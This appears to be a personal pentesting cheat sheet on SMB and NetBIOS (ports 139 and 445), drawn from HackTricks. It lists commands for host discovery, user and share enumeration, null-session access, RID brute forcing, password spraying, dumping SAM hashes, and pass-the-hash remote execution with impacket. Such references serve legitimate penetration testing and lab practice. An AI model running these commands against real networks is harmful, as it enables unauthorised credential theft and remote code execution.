Owlglass

Pentest - SMB p 139,445

HackTricks

Port 139 NetBIOS

NetBIOS is Network Basic Input Output System, which is a software protocol that allows applications, PCs, and Desktops on a local area network (LAN) to communicate with network hardware and to transmit data across the network.

Port 445 SMB - Server Message Block

While Port 139 is known technically as ‘NBT over IP’, Port 445 is ‘SMB over IP’. SMB stands for ‘Server Message Blocks’.

SMB

Server Message Block (SMB) is a client-server protocol that regulates access to files and entire directories and other network resources such as printers, routers, or interfaces released for the network.

Server Enumeration

Search for hosts:

1

nbtscan -r 192.168.1.1/24

SMB information

1
2
3
4
5
6
7

enum4linux -a [-u "<username>" -p "<passwd>"] <IP>
enum4linux-ng -A [-u "<username>" -p "<passwd>"] <IP>

# connect to rpc
rpcclient -U "" -N <IP> #No creds
rpcclient //machine.htb -U domain.local/USERNAME%754d87d42adabcca32bdb34a876cbffb  --pw-nt-hash
rpcclient -U "username%passwd" <IP> #With creds

smbclient //10.10.10.10/Public -U 'anonymous' -N

See also impacket: samrdump, rpcdump

Users, Groups

1
2
3
4
5
6
7

crackmapexec smb 10.10.10.10 --users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 --groups --loggedon-users [-u <username> -p <password>]
crackmapexec smb 10.10.10.10 -u usernames.txt -p ‘’ --continue-on-success


ldapsearch -x -b "DC=DOMAIN_NAME,DC=LOCAL" -s sub "(&(objectclass=user))" -h 10.10.10.10 | grep -i samaccountname: | cut -f 2 -d " "

Anonymous logon

crackmapexec smb <host> -u 'a' -p '' --shares

List files

crackmapexec smb <host> -u 'a' -p '' -M spider_plus

Download files

crackmapexec smb <host> -u 'a' -p '' -M spider_plus -o DOWNLOAD_FLAG=TRUE EXCLUDE_DIR=IPC$

IPC$ Share

With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. The enum4linux utility within Kali Linux is particularly useful; with it, you can obtain the following:

  • Operating system information
  • Details of the parent domain
  • A list of local users and groups
  • Details of available SMB shares
  • The effective system security policy

RID cycling with crackmapexec

1

crackmapexec smb <ip> -u 'a' -p '' -d <domain> --rid-brute |grep User

then, eg, check for UF_DONT_REQUIRE_PREAUTH and AS-REP Roasting. Then attempt crackmapexec with smb and username password combinations. Passwords from list (eg rockyou), customized list, usernames as passwords (backwards and forwards, case change, etc).

SMB Command Execution

1

impacket-smbexec administrator:'<password>'@machine.htb

Dump sam hashes

1

crackmapexec smb <IP> -u <username> -p "PASSWORD" --sam

wmiexec

1

impacket-wmiexec <user>@<ip> -hashes "<user hash>"